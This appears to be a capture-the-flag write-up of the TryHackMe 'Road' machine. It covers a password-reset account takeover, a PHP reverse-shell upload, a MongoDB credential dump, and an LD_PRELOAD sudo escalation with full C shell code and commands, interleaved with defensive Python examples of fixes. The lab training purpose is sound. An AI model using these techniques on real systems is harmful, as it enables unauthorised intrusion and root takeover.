Road — TryHackMe
Here we go again…

In this writeup, we'll pentest a great machine, Road by StillNoob, on TryHackMe.
Room: https://tryhackme.com/room/road
We start by performing some active reconnaissance by running Nmap to scan for open ports.

From the scan, we see that an Apache web server is running on port 80.
Poking around the web application further, we find that we can register a new user and sign in.


Once logged in, we find that each user has a profile page with a profile-image upload feature.
However, only the admin has access to that feature. The page does, however, disclose the admin's email address, admin@sky.thm, in cleartext.

The next thing to try is gaining access to the website as admin@sky.thm. Look at the password-reset page: the Username field is greyed out and only the password fields are editable.

We fire up Burp Suite, turn Intercept on and capture the reset request.

Then we send the request to Repeater, change the username from test@test.com to admin@sky.thm and forward it. The greyed-out field was only a client-side restriction; the server trusts whatever username arrives in the request body. As the response below shows, the password for admin@sky.thm has been changed successfully.
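To make the root cause concrete from the defender's side, here is an added example (not code from the room or its author) that models the reset handler twice: once trusting the email in the POST body, as the room's application does, and once deriving the account from the server-side session and re-checking the current password. The user store, session and request are plain dicts, and every email, password and name in it is constructed for illustration.

```python
"""Password-reset handler: the pattern exploited above, beside a hardened one.

Added example, not code from the Road room or its author. The request,
session and user store are plain dicts so it runs offline; every email,
password and name below is constructed for illustration.
"""
import hashlib
import hmac
import os


def _hash_password(password: str, salt: bytes) -> bytes:
    """Salted PBKDF2 so stored hashes are not directly comparable."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 50_000)


def make_user_store(*emails: str) -> dict:
    """Constructed user table: email -> {salt, hash}. The initial password is
    'initial-<email>' purely so the demo can authenticate."""
    store = {}
    for email in emails:
        salt = os.urandom(16)
        store[email] = {"salt": salt, "hash": _hash_password("initial-" + email, salt)}
    return store


def verify_password(store: dict, email: str, password: str) -> bool:
    rec = store.get(email)
    if rec is None:
        return False
    return hmac.compare_digest(rec["hash"], _hash_password(password, rec["salt"]))


def reset_password_vulnerable(store: dict, session: dict, form: dict) -> tuple:
    """The flaw shown above: the account to change comes from the POST body.
    A greyed-out input is only a client-side hint; Repeater can send any value."""
    email = form["email"]                       # attacker-controlled
    if email not in store:
        return 404, "no such user"
    salt = os.urandom(16)
    store[email] = {"salt": salt, "hash": _hash_password(form["password"], salt)}
    return 200, f"password for {email} changed"


def reset_password_hardened(store: dict, session: dict, form: dict) -> tuple:
    """Identity comes from the server-side session, the request must not name a
    different account, and the current password is re-checked before changing."""
    email = session.get("user")                 # set at login, never by the client
    if email is None or email not in store:
        return 401, "not authenticated"
    if "email" in form and form["email"] != email:
        return 400, "account mismatch"          # worth logging: a tampering signal
    if not verify_password(store, email, form.get("current_password", "")):
        return 403, "current password incorrect"
    salt = os.urandom(16)
    store[email] = {"salt": salt, "hash": _hash_password(form["password"], salt)}
    return 200, f"password for {email} changed"


def demo() -> dict:
    """Replays the tampered request against both handlers, then a legitimate
    self-service reset against the hardened one."""
    store = make_user_store("test@test.com", "admin@sky.thm")
    session = {"user": "test@test.com"}          # logged in as the low-privilege user
    tampered = {"email": "admin@sky.thm", "password": "attacker-chosen",
                "current_password": "initial-test@test.com"}
    vuln_status, _ = reset_password_vulnerable(store, session, tampered)
    admin_changed = verify_password(store, "admin@sky.thm", "attacker-chosen")

    store = make_user_store("test@test.com", "admin@sky.thm")
    hard_status, _ = reset_password_hardened(store, session, tampered)
    admin_intact = verify_password(store, "admin@sky.thm", "initial-admin@sky.thm")

    own = {"password": "new-pass", "current_password": "initial-test@test.com"}
    own_status, _ = reset_password_hardened(store, session, own)
    return {"vulnerable": vuln_status, "admin_changed": admin_changed,
            "hardened": hard_status, "admin_intact": admin_intact,
            "own_reset": own_status}


if __name__ == "__main__":
    print(demo())
```

The design point is that the hardened handler never reads the account identifier from the request at all; the check on a mismatching email field exists only so that tampering attempts are rejected loudly and can be logged, rather than silently ignored.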

Now we sign in as admin@sky.thm and can successfully upload a profile image. Inspecting the source code of the profile page, we find a commented-out URL path that looks like the location where uploaded profile images are stored.

Navigating to that URL path, we see our uploaded image, which confirms the assumption. Uploaded files can be accessed at the URL path below:
http://10.10.113.161/v2/profileimages/{fileNameUploaded}
There is no file-type filtering to prevent unwanted, potentially malicious files from being uploaded, and the upload directory is served directly by the web server. We can use this to achieve remote code execution by uploading a PHP reverse shell.
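The missing control is input validation on the upload endpoint. The following is an added example (not code from the room or its author) of the checks a profile-image upload should perform: an extension allowlist, rejection of multiple extensions, a size limit, content sniffing from magic bytes, a mismatch check between declared and sniffed type, and a server-generated filename that ignores the client's name entirely. The sample files are constructed byte strings; the function names are assumptions for illustration.

```python
"""Profile-image upload validation: the checks the Road upload endpoint lacks.

Added example, not code from the room. Sample inputs below are constructed.
"""
import os
import secrets

ALLOWED_EXT = {"png", "jpg", "jpeg", "gif"}
MAX_BYTES = 2 * 1024 * 1024

# Magic-byte prefixes for the image types we accept.
MAGIC = {
    "png": [b"\x89PNG\r\n\x1a\n"],
    "jpg": [b"\xff\xd8\xff"],
    "gif": [b"GIF87a", b"GIF89a"],
}


def sniff_type(data: bytes):
    """Return the image type implied by the leading bytes, or None."""
    for kind, prefixes in MAGIC.items():
        if any(data.startswith(p) for p in prefixes):
            return kind
    return None


def validate_upload(filename: str, data: bytes) -> tuple:
    """Return (ok, reason, stored_name). stored_name never reuses the client
    name: random token plus an extension derived from the sniffed content."""
    base = os.path.basename(filename)           # drop any path components
    parts = base.lower().split(".")
    if len(parts) < 2:
        return False, "no extension", None
    ext = parts[-1]
    if ext not in ALLOWED_EXT:
        return False, f"extension .{ext} not allowed", None
    if len(parts) > 2:
        return False, "multiple extensions rejected", None   # e.g. x.php.png
    if len(data) == 0 or len(data) > MAX_BYTES:
        return False, "bad size", None
    kind = sniff_type(data)
    if kind is None:
        return False, "content is not a recognised image", None
    declared = "jpg" if ext == "jpeg" else ext
    if kind != declared:
        return False, f"content ({kind}) does not match extension (.{ext})", None
    if b"<?php" in data or b"<?=" in data:
        return False, "image data carries PHP source", None
    stored = f"{secrets.token_hex(16)}.{kind}"
    return True, "ok", stored


def demo() -> dict:
    """Constructed samples: a minimal PNG header and a harmless PHP file."""
    png = b"\x89PNG\r\n\x1a\n" + b"\x00" * 64
    php = b"<?php echo 'hello'; ?>"
    return {
        "good_png": validate_upload("me.png", png)[0],
        "php_ext": validate_upload("php-reverse-shell.php", php)[0],
        "double_ext": validate_upload("x.php.png", png)[0],
        "fake_png": validate_upload("x.png", php)[0],
        "path_stripped": validate_upload("../../x.png", png)[0],
    }


if __name__ == "__main__":
    for name, ok in demo().items():
        print(f"{name}: {'accepted' if ok else 'rejected'}")
```

Validation alone is not the whole fix: the directory that stores uploads should also be configured so the web server never executes scripts from it, so that a file which slips past the checks is served as data rather than run.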
An easy way to obtain a PHP reverse shell is to download it from here https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php
NB: Make sure to change the IP address and port in the default script to your own IP and port of choice.

Set up a Netcat listener (wrapped in rlwrap for line editing) to catch the reverse shell.

Then upload php-reverse-shell.php on the profile page and trigger it by browsing to the uploaded file:
http://10.10.44.19/v2/profileimages/php-reverse-shell.php
and bam! We have a shell!

We can further stabilise it by running the following command
python3 -c 'import pty;pty.spawn("/bin/bash")'
Now we search for the location of the user.txt file with the following command, which gives us the file path:
find / -name "user.txt" 2>/dev/null

Reading the content of the file, we obtain the flag.
Privilege Escalation level 1
In order to read root.txt, which only the root user can access, we need to escalate our privileges to root.
Enumerating the machine further, we find MongoDB and MySQL service accounts in /etc/passwd, which suggests that MongoDB might be running.
You can list the users yourself by running getent passwd, and then use ss to list all listening ports.

The listening ports above tell us which services are likely running on them:
- port 33060: default port for MySQL (see the MySQL documentation on default ports)
- port 27017: default port for MongoDB (see the MongoDB documentation on default ports)
So MongoDB is indeed running, and we can connect to it by running the mongo shell from the terminal.

Enter show dbs to list the available databases. The backup database looks the most interesting.

Enter use backup to switch to the backup database.

Enter show collections; to list the collections in the database. We find a collection named user, which could be interesting.

Enter db.user.find(); to dump the documents in the collection. Bam! We obtain the password for the user webdeveloper, stored in cleartext.

Privilege Escalation level 2
Now we switch to the webdeveloper user with the newly obtained password; you can either use ssh or just switch with the su command on the terminal.
Enumerating this user, we run sudo -l to list all the commands the webdeveloper user can run using sudo.

LD_PRELOAD is an environment variable that tells the dynamic loader to load the named shared library into a program before any other library, so code in that library runs inside the target process. sudo normally strips it from the environment, but here the env_keep option preserves it. This blog post will give you an idea of the capabilities of LD_PRELOAD.
The steps of this privilege escalation vector can be summarised as follows:
- Check for LD_PRELOAD (with the env_keep option) in the sudo -l output
- Write a small C program compiled as a shared object (.so) file
- Run the permitted program with sudo and LD_PRELOAD pointing to our .so file
Now let's write the C code that spawns a root shell:
#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>   /* setgid, setuid */

/* Runs when the library is loaded; -nostartfiles lets us define _init ourselves */
void _init() {
    unsetenv("LD_PRELOAD");   /* stop the child shell from preloading us again */
    setgid(0);
    setuid(0);
    system("/bin/bash");
}
We save this code as shell.c and compile it with gcc into a shared object file using the following parameters:
gcc -fPIC -shared -o shell.so shell.c -nostartfiles
Then we run the permitted program with the LD_PRELOAD variable set, as follows:
sudo LD_PRELOAD=/home/webdeveloper/shell.so sky_backup_utility
This results in a shell spawned with root privileges.

NB: sky_backup_utility is the command that webdeveloper is allowed to run as root, as shown by the sudo -l output.
Now we search for the root.txt file and BAM! We obtain the final flag.

Thank you for following this far and I hope it was an informative and enjoyable writeup. Also, should you guys have any suggestions, please leave a comment below.
Until the next…Ciao!
— — — — — — — — — — — — — — THE END — — — — — — — — — — — — —